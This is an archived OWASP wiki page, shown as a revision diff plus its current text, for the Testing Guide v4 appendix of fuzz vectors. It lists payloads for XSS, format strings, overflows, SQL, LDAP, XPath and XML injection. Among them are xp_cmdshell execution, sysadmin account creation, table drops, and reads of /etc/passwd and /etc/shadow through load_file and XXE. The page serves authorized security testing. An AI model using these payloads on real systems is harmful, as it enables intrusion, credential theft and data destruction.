This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "OWASP Testing Guide Appendix C: Fuzz Vectors"
(Final edit) |
|||
(61 intermediate revisions by 10 users not shown) | |||
Line 1: | Line 1: | ||
− | {{Template:OWASP Testing Guide}} | + | {{Template:OWASP Testing Guide v4}} |
− | The following are fuzzing vectors which can be used with | + | |
− | Fuzzing is the "kitchen sink" approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing. | + | |
− | This is the simple part of the discovery phase. | + | The following are fuzzing vectors which can be used with [[WebScarab]], [[JBroFuzz]], [[WSFuzzer]], [[ZAP]] or another fuzzer. |
− | Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required: | + | Fuzzing is the "kitchen sink" approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing. This is the simple part of the discovery phase. Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required. |
+ | |||
+ | |||
+ | === Fuzz Categories === | ||
+ | |||
+ | In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist: | ||
+ | |||
+ | * Recursive fuzzing | ||
+ | * Replacive fuzzing | ||
+ | |||
+ | |||
+ | We examine and define each category in the sub-sections that follow. | ||
+ | |||
+ | |||
+ | ==== Recursive fuzzing ==== | ||
+ | |||
+ | Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of: | ||
+ | |||
+ | <pre> | ||
+ | <nowiki>http://www.example.com/8302fa3b</nowiki> | ||
+ | </pre> | ||
+ | |||
+ | Selecting "8302fa3b" as a part of the request to be fuzzed against the set hexadecimal alphabet (i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f}) falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form: | ||
+ | <pre> | ||
+ | <nowiki>http://www.example.com/00000000</nowiki> | ||
+ | <nowiki>...</nowiki> | ||
+ | <nowiki>http://www.example.com/11000fff</nowiki> | ||
+ | <nowiki>...</nowiki> | ||
+ | <nowiki>http://www.example.com/ffffffff</nowiki> | ||
+ | </pre> | ||
+ | |||
+ | |||
+ | ==== Replacive fuzzing ==== | ||
+ | |||
+ | Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of: | ||
+ | |||
+ | <pre> | ||
+ | <nowiki>http://www.example.com/8302fa3b</nowiki> | ||
+ | </pre> | ||
+ | |||
+ | |||
+ | Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors: | ||
+ | |||
+ | <pre> | ||
+ | <nowiki>http://www.example.com/>"><script>alert("XSS")</script>&</nowiki> | ||
+ | <nowiki>http://www.example.com/'';!--"<XSS>=&{()}</nowiki> | ||
+ | </pre> | ||
+ | |||
+ | This is a form of replacive fuzzing. In this category, the total number of requests is dependent on the number of fuzz vectors specified. | ||
+ | |||
+ | |||
+ | The remainder of this appendix presents a number of fuzz vector categories. | ||
+ | |||
+ | |||
+ | === Cross Site Scripting (XSS) === | ||
+ | |||
+ | For details on XSS: [[Cross-site Scripting (XSS)]] | ||
+ | |||
+ | <nowiki>>"><script>alert("XSS")</script>&</nowiki> | ||
+ | <nowiki>"><STYLE>@import"javascript:alert('XSS')";</STYLE></nowiki> | ||
+ | <nowiki>>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a; | ||
+ | alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)></nowiki><br> | ||
+ | <nowiki>>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22></nowiki> | ||
+ | <nowiki>'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'</nowiki> | ||
+ | <nowiki>"></nowiki> | ||
+ | <nowiki>>"</nowiki> | ||
+ | <nowiki>'';!--"<XSS>=&{()}</nowiki> | ||
+ | <nowiki><IMG SRC="javascript:alert('XSS');"></nowiki> | ||
+ | <nowiki><IMG SRC=javascript:alert('XSS')></nowiki> | ||
+ | <nowiki><IMG SRC=JaVaScRiPt:alert('XSS')> </nowiki> | ||
+ | <nowiki><IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)></nowiki> | ||
+ | <nowiki><IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97; | ||
+ | &#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41></nowiki> | ||
+ | <nowiki><IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t: | ||
+ | &<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')></nowiki><br> | ||
+ | <nowiki><IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert( | ||
+ | &<WBR>#x27XSS')></nowiki><br> | ||
+ | <nowiki><IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');"></nowiki> | ||
+ | <nowiki><IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"></nowiki> | ||
+ | <nowiki><IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"></nowiki> | ||
+ | |||
+ | |||
+ | === Buffer Overflows and Format String Errors === | ||
+ | |||
+ | ==== Buffer Overflows (BFO) ==== | ||
+ | A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory. | ||
+ | |||
+ | |||
+ | For details on Buffer Overflows: [[Testing for Buffer Overflow (OWASP-DV-014) | Testing for Buffer Overflow ]] | ||
+ | |||
+ | |||
+ | Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash. | ||
+ | |||
+ | <nowiki>A x 5</nowiki> | ||
+ | <nowiki>A x 17</nowiki> | ||
+ | <nowiki>A x 33</nowiki> | ||
+ | <nowiki>A x 65</nowiki> | ||
+ | <nowiki>A x 129</nowiki> | ||
+ | <nowiki>A x 257</nowiki> | ||
+ | <nowiki>A x 513</nowiki> | ||
+ | <nowiki>A x 1024</nowiki> | ||
+ | <nowiki>A x 2049</nowiki> | ||
+ | <nowiki>A x 4097</nowiki> | ||
+ | <nowiki>A x 8193</nowiki> | ||
+ | <nowiki>A x 12288</nowiki> | ||
+ | |||
+ | |||
+ | ==== Format String Errors (FSE) ==== | ||
+ | |||
+ | Format string attacks are a class of vulnerabilities that involve supplying language specific format tokens to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input. | ||
+ | |||
+ | |||
+ | An excellent introduction on FSE can be found in the USENIX paper entitled: [http://research.microsoft.com/pubs/74359/01-shankar.pdfl Detecting Format String Vulnerabilities with Type Qualifiers] | ||
+ | |||
+ | |||
+ | Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash. | ||
+ | |||
+ | <nowiki>%s%p%x%d</nowiki> | ||
+ | <nowiki>.1024d</nowiki> | ||
+ | <nowiki>%.2049d</nowiki> | ||
+ | <nowiki>%p%p%p%p</nowiki> | ||
+ | <nowiki>%x%x%x%x</nowiki> | ||
+ | <nowiki>%d%d%d%d</nowiki> | ||
+ | <nowiki>%s%s%s%s</nowiki> | ||
+ | <nowiki>%99999999999s</nowiki> | ||
+ | <nowiki>%08x</nowiki> | ||
+ | <nowiki>%%20d</nowiki> | ||
+ | <nowiki>%%20n</nowiki> | ||
+ | <nowiki>%%20x</nowiki> | ||
+ | <nowiki>%%20s</nowiki> | ||
+ | <nowiki>%s%s%s%s%s%s%s%s%s%s</nowiki> | ||
+ | <nowiki>%p%p%p%p%p%p%p%p%p%p</nowiki> | ||
+ | <nowiki>%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%</nowiki> | ||
+ | <nowiki>%s x 129</nowiki> | ||
+ | <nowiki>%x x 257</nowiki> | ||
+ | |||
+ | |||
+ | ==== Integer Overflows (INT) ==== | ||
+ | |||
+ | Integer overflow errors occur when a program fails to account for the fact that an arithmetic operation can result in a quantity either greater than a data type's maximum value or less than its minimum value. If a tester can cause the program to perform such a memory allocation, the program can be potentially vulnerable to a buffer overflow attack. | ||
+ | |||
+ | <nowiki>-1</nowiki> | ||
+ | <nowiki>0</nowiki> | ||
+ | <nowiki>0x100</nowiki> | ||
+ | <nowiki>0x1000</nowiki> | ||
+ | <nowiki>0x3fffffff</nowiki> | ||
+ | <nowiki>0x7ffffffe</nowiki> | ||
+ | <nowiki>0x7fffffff</nowiki> | ||
+ | <nowiki>0x80000000</nowiki> | ||
+ | <nowiki>0xfffffffe</nowiki> | ||
+ | <nowiki>0xffffffff</nowiki> | ||
+ | <nowiki>0x10000</nowiki> | ||
+ | <nowiki>0x100000</nowiki> | ||
+ | |||
+ | |||
+ | === SQL Injection === | ||
+ | |||
+ | This attack can affect the database layer of an application and is typically present when user input is not filtered for SQL statements. | ||
+ | |||
+ | |||
+ | For details on Testing SQL Injection: [[Testing for SQL Injection (OWASP-DV-005)|Testing for SQL Injection]] | ||
+ | |||
+ | |||
+ | SQL Injection is classified in the following two categories, depending on the exposure of database information (passive) or the alteration of database information (active). | ||
+ | |||
+ | * Passive SQL Injection | ||
+ | * Active SQL Injection | ||
+ | |||
+ | |||
+ | Active SQL Injection statements can have a detrimental effect on the underlying database if successfully executed. | ||
+ | |||
+ | |||
+ | ==== Passive SQL Injection (SQP) ==== | ||
+ | |||
+ | <nowiki>'||(elt(-3+5,bin(15),ord(10),hex(char(45))))</nowiki> | ||
+ | <nowiki>||6</nowiki> | ||
+ | <nowiki>'||'6</nowiki> | ||
+ | <nowiki>(||6)</nowiki> | ||
+ | <nowiki>' OR 1=1--</nowiki> | ||
+ | <nowiki>OR 1=1</nowiki> | ||
+ | <nowiki>' OR '1'='1</nowiki> | ||
+ | <nowiki>; OR '1'='1'</nowiki> | ||
+ | <nowiki>%22+or+isnull%281%2F0%29+%2F*</nowiki> | ||
+ | <nowiki>%27+OR+%277659%27%3D%277659</nowiki> | ||
+ | <nowiki>%22+or+isnull%281%2F0%29+%2F*</nowiki> | ||
+ | <nowiki>%27+--+</nowiki> | ||
+ | <nowiki>' or 1=1--</nowiki> | ||
+ | <nowiki>" or 1=1--</nowiki> | ||
+ | <nowiki>' or 1=1 /*</nowiki> | ||
+ | <nowiki>or 1=1--</nowiki> | ||
+ | <nowiki>' or 'a'='a</nowiki> | ||
+ | <nowiki>" or "a"="a</nowiki> | ||
+ | <nowiki>') or ('a'='a</nowiki> | ||
+ | <nowiki>Admin' OR '</nowiki> | ||
+ | <nowiki>'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--</nowiki> | ||
+ | <nowiki>) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;</nowiki> | ||
+ | <nowiki>' having 1=1--</nowiki> | ||
+ | <nowiki>' having 1=1--</nowiki> | ||
+ | <nowiki>' group by userid having 1=1--</nowiki> | ||
+ | <nowiki>' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--</nowiki> | ||
+ | <nowiki>' or 1 in (select @@version)--</nowiki> | ||
+ | <nowiki>' union all select @@version--</nowiki> | ||
+ | <nowiki>' OR 'unusual' = 'unusual'</nowiki> | ||
+ | <nowiki>' OR 'something' = 'some'+'thing'</nowiki> | ||
+ | <nowiki>' OR 'text' = N'text'</nowiki> | ||
+ | <nowiki>' OR 'something' like 'some%'</nowiki> | ||
+ | <nowiki>' OR 2 > 1</nowiki> | ||
+ | <nowiki>' OR 'text' > 't'</nowiki> | ||
+ | <nowiki>' OR 'whatever' in ('whatever')</nowiki> | ||
+ | <nowiki>' OR 2 BETWEEN 1 and 3</nowiki> | ||
+ | <nowiki>' or username like char(37);</nowiki> | ||
+ | <nowiki>' union select * from users where login = char(114,111,111,116);</nowiki> | ||
+ | <nowiki>' union select </nowiki> | ||
+ | <nowiki>Password:*/=1--</nowiki> | ||
+ | <nowiki>UNI/**/ON SEL/**/ECT</nowiki> | ||
+ | <nowiki>'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'</nowiki> | ||
+ | <nowiki>'; EXEC ('SEL' + 'ECT US' + 'ER')</nowiki> | ||
+ | <nowiki>'/**/OR/**/1/**/=/**/1</nowiki> | ||
+ | <nowiki>' or 1/*</nowiki> | ||
+ | <nowiki>+or+isnull%281%2F0%29+%2F*</nowiki> | ||
+ | <nowiki>%27+OR+%277659%27%3D%277659</nowiki> | ||
+ | <nowiki>%22+or+isnull%281%2F0%29+%2F*</nowiki> | ||
+ | <nowiki>%27+--+&password=</nowiki> | ||
+ | <nowiki>'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > | ||
+ | @var select @var as var into temp end --</nowiki><br> | ||
+ | <nowiki>' and 1 in (select var from temp)--</nowiki> | ||
+ | <nowiki>' union select 1,load_file('/etc/passwd'),1,1,1;</nowiki> | ||
+ | <nowiki>1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;</nowiki> | ||
+ | <nowiki>' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));</nowiki> | ||
+ | |||
+ | |||
+ | ==== Active SQL Injection (SQI) ==== | ||
+ | |||
+ | <nowiki>'; exec master..xp_cmdshell 'ping 10.10.1.2'--</nowiki> | ||
+ | <nowiki>CREATE USER name IDENTIFIED BY 'pass123'</nowiki> | ||
+ | <nowiki>CREATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; </nowiki> | ||
+ | <nowiki>' ; drop table temp --</nowiki> | ||
+ | <nowiki>exec sp_addlogin 'name' , 'password'</nowiki> | ||
+ | <nowiki>exec sp_addsrvrolemember 'name' , 'sysadmin'</nowiki> | ||
+ | <nowiki>INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123'))</nowiki> | ||
+ | <nowiki>GRANT CONNECT TO name; GRANT RESOURCE TO name;</nowiki> | ||
+ | <nowiki>INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) | ||
+ | + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)</nowiki> | ||
+ | |||
+ | |||
+ | === LDAP Injection === | ||
+ | |||
+ | For details on LDAP Injection: [[Testing for LDAP Injection (OWASP-DV-006)|Testing for LDAP Injection]] | ||
+ | |||
+ | <nowiki>|</nowiki> | ||
+ | <nowiki>!</nowiki> | ||
+ | <nowiki>(</nowiki> | ||
+ | <nowiki>)</nowiki> | ||
+ | <nowiki>%28</nowiki> | ||
+ | <nowiki>%29</nowiki> | ||
+ | <nowiki>&</nowiki> | ||
+ | <nowiki>%26</nowiki> | ||
+ | <nowiki>%21</nowiki> | ||
+ | <nowiki>%7C</nowiki> | ||
+ | <nowiki>*|</nowiki> | ||
+ | <nowiki>%2A%7C</nowiki> | ||
+ | <nowiki>*(|(mail=*))</nowiki> | ||
+ | <nowiki>%2A%28%7C%28mail%3D%2A%29%29</nowiki> | ||
+ | <nowiki>*(|(objectclass=*))</nowiki> | ||
+ | <nowiki>%2A%28%7C%28objectclass%3D%2A%29%29</nowiki> | ||
+ | <nowiki>*()|%26'</nowiki> | ||
+ | <nowiki>admin*</nowiki> | ||
+ | <nowiki>admin*)((|userPassword=*)</nowiki> | ||
+ | <nowiki>*)(uid=*))(|(uid=*</nowiki> | ||
+ | |||
+ | |||
+ | === XPATH Injection === | ||
+ | |||
+ | For details on XPATH Injection: [[Testing for XPath Injection (OWASP-DV-010)|Testing for XPath Injection]] | ||
+ | |||
+ | <nowiki>'+or+'1'='1</nowiki> | ||
+ | <nowiki>'+or+''='</nowiki> | ||
+ | <nowiki>x'+or+1=1+or+'x'='y</nowiki> | ||
+ | <nowiki>/</nowiki> | ||
+ | <nowiki>//</nowiki> | ||
+ | <nowiki>//*</nowiki> | ||
+ | <nowiki>*/*</nowiki> | ||
+ | <nowiki>@*</nowiki> | ||
+ | <nowiki>count(/child::node())</nowiki> | ||
+ | <nowiki>x'+or+name()='username'+or+'x'='y</nowiki> | ||
+ | |||
+ | |||
+ | === XML Injection === | ||
+ | |||
+ | Details on XML Injection here: [[Testing for XML Injection (OWASP-DV-008)|Testing for XML Injection]] | ||
+ | |||
+ | <nowiki><![CDATA[<script>var n=0;while(true){n++;}</script>]]></nowiki> | ||
+ | <nowiki><?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo></nowiki> | ||
+ | <nowiki><?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof></nowiki> | ||
+ | <nowiki><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo></nowiki> | ||
+ | <nowiki><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo></nowiki> | ||
+ | <nowiki><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo></nowiki> | ||
+ | <nowiki><?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo></nowiki> |
Latest revision as of 10:17, 14 May 2014
This article is part of the new OWASP Testing Guide v4.
Back to the OWASP Testing Guide v4 ToC: https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents Back to the OWASP Testing Guide Project: https://www.owasp.org/index.php/OWASP_Testing_Project
The following are fuzzing vectors which can be used with WebScarab, JBroFuzz, WSFuzzer, ZAP or another fuzzer.
Fuzzing is the "kitchen sink" approach to testing the response of an application to parameter manipulation. Generally one looks for error conditions that are generated in an application as a result of fuzzing. This is the simple part of the discovery phase. Once an error has been discovered identifying and exploiting a potential vulnerability is where skill is required.
Fuzz Categories
In the case of stateless network protocol fuzzing (like HTTP(S)) two broad categories exist:
- Recursive fuzzing
- Replacive fuzzing
We examine and define each category in the sub-sections that follow.
Recursive fuzzing
Recursive fuzzing can be defined as the process of fuzzing a part of a request by iterating through all the possible combinations of a set alphabet. Consider the case of:
http://www.example.com/8302fa3b
Selecting "8302fa3b" as a part of the request to be fuzzed against the set hexadecimal alphabet (i.e. {0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f}) falls under the category of recursive fuzzing. This would generate a total of 16^8 requests of the form:
http://www.example.com/00000000 ... http://www.example.com/11000fff ... http://www.example.com/ffffffff
Replacive fuzzing
Replacive fuzzing can be defined as the process of fuzzing part of a request by means of replacing it with a set value. This value is known as a fuzz vector. In the case of:
http://www.example.com/8302fa3b
Testing against Cross Site Scripting (XSS) by sending the following fuzz vectors:
http://www.example.com/>"><script>alert("XSS")</script>& http://www.example.com/'';!--"<XSS>=&{()}
This is a form of replacive fuzzing. In this category, the total number of requests is dependent on the number of fuzz vectors specified.
The remainder of this appendix presents a number of fuzz vector categories.
Cross Site Scripting (XSS)
For details on XSS: Cross-site Scripting (XSS)
>"><script>alert("XSS")</script>& "><STYLE>@import"javascript:alert('XSS')";</STYLE> >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a; alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>
>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' "> >" '';!--"<XSS>=&{()} <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=JaVaScRiPt:alert("XSS<WBR>")> <IMGSRC=java&<WBR>#115;crip&<WBR>#116;:a le&<WBR>#114;t('XS<WBR>;S')> <IMGSRC=ja&<WBR>#0000118as&<WBR>#0000099ri&<WBR>#0000112t: &<WBR>#0000097le&<WBR>#0000114t(&<WBR>#0000039XS&<WBR>#0000083')>
<IMGSRC=javas&<WBR>#x63ript:&<WBR>#x61lert( &<WBR>#x27XSS')>
<IMG SRC="jav	ascript:alert(<WBR>'XSS');"> <IMG SRC="jav
ascript:alert(<WBR>'XSS');"> <IMG SRC="jav
ascript:alert(<WBR>'XSS');">
Buffer Overflows and Format String Errors
Buffer Overflows (BFO)
A buffer overflow or memory corruption attack is a programming condition which allows overflowing of valid data beyond its prelocated storage limit in memory.
For details on Buffer Overflows: Testing for Buffer Overflow
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.
A x 5 A x 17 A x 33 A x 65 A x 129 A x 257 A x 513 A x 1024 A x 2049 A x 4097 A x 8193 A x 12288
Format String Errors (FSE)
Format string attacks are a class of vulnerabilities that involve supplying language specific format tokens to execute arbitrary code or crash a program. Fuzzing for such errors has as an objective to check for unfiltered user input.
An excellent introduction on FSE can be found in the USENIX paper entitled: Detecting Format String Vulnerabilities with Type Qualifiers
Note that attempting to load such a definition file within a fuzzer application can potentially cause the application to crash.
%s%p%x%d .1024d %.2049d %p%p%p%p %x%x%x%x %d%d%d%d %s%s%s%s %99999999999s %08x %%20d %%20n %%20x %%20s %s%s%s%s%s%s%s%s%s%s %p%p%p%p%p%p%p%p%p%p %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% %s x 129 %x x 257
Integer Overflows (INT)
Integer overflow errors occur when a program fails to account for the fact that an arithmetic operation can result in a quantity either greater than a data type's maximum value or less than its minimum value. If a tester can cause the program to perform such a memory allocation, the program can be potentially vulnerable to a buffer overflow attack.
-1 0 0x100 0x1000 0x3fffffff 0x7ffffffe 0x7fffffff 0x80000000 0xfffffffe 0xffffffff 0x10000 0x100000
SQL Injection
This attack can affect the database layer of an application and is typically present when user input is not filtered for SQL statements.
For details on Testing SQL Injection: Testing for SQL Injection
SQL Injection is classified in the following two categories, depending on the exposure of database information (passive) or the alteration of database information (active).
- Passive SQL Injection
- Active SQL Injection
Active SQL Injection statements can have a detrimental effect on the underlying database if successfully executed.
Passive SQL Injection (SQP)
'||(elt(-3+5,bin(15),ord(10),hex(char(45)))) ||6 '||'6 (||6) ' OR 1=1-- OR 1=1 ' OR '1'='1 ; OR '1'='1' %22+or+isnull%281%2F0%29+%2F* %27+OR+%277659%27%3D%277659 %22+or+isnull%281%2F0%29+%2F* %27+--+ ' or 1=1-- " or 1=1-- ' or 1=1 /* or 1=1-- ' or 'a'='a " or "a"="a ') or ('a'='a Admin' OR ' '%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES-- ) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES; ' having 1=1-- ' having 1=1-- ' group by userid having 1=1-- ' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')-- ' or 1 in (select @@version)-- ' union all select @@version-- ' OR 'unusual' = 'unusual' ' OR 'something' = 'some'+'thing' ' OR 'text' = N'text' ' OR 'something' like 'some%' ' OR 2 > 1 ' OR 'text' > 't' ' OR 'whatever' in ('whatever') ' OR 2 BETWEEN 1 and 3 ' or username like char(37); ' union select * from users where login = char(114,111,111,116); ' union select Password:*/=1-- UNI/**/ON SEL/**/ECT '; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' '; EXEC ('SEL' + 'ECT US' + 'ER') '/**/OR/**/1/**/=/**/1 ' or 1/* +or+isnull%281%2F0%29+%2F* %27+OR+%277659%27%3D%277659 %22+or+isnull%281%2F0%29+%2F* %27+--+&password= '; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > @var select @var as var into temp end --
' and 1 in (select var from temp)-- ' union select 1,load_file('/etc/passwd'),1,1,1; 1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1; ' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
Active SQL Injection (SQI)
'; exec master..xp_cmdshell 'ping 10.10.1.2'-- CREATE USER name IDENTIFIED BY 'pass123' CREATE USER name IDENTIFIED BY pass123 TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users; ' ; drop table temp -- exec sp_addlogin 'name' , 'password' exec sp_addsrvrolemember 'name' , 'sysadmin' INSERT INTO mysql.user (user, host, password) VALUES ('name', 'localhost', PASSWORD('pass123')) GRANT CONNECT TO name; GRANT RESOURCE TO name; INSERT INTO Users(Login, Password, Level) VALUES( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
LDAP Injection
For details on LDAP Injection: Testing for LDAP Injection
| ! ( ) %28 %29 & %26 %21 %7C *| %2A%7C *(|(mail=*)) %2A%28%7C%28mail%3D%2A%29%29 *(|(objectclass=*)) %2A%28%7C%28objectclass%3D%2A%29%29 *()|%26' admin* admin*)((|userPassword=*) *)(uid=*))(|(uid=*
XPATH Injection
For details on XPATH Injection: Testing for XPath Injection
'+or+'1'='1 '+or+''=' x'+or+1=1+or+'x'='y / // //* */* @* count(/child::node()) x'+or+name()='username'+or+'x'='y
XML Injection
Details on XML Injection here: Testing for XML Injection
<![CDATA[<script>var n=0;while(true){n++;}</script>]]> <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo>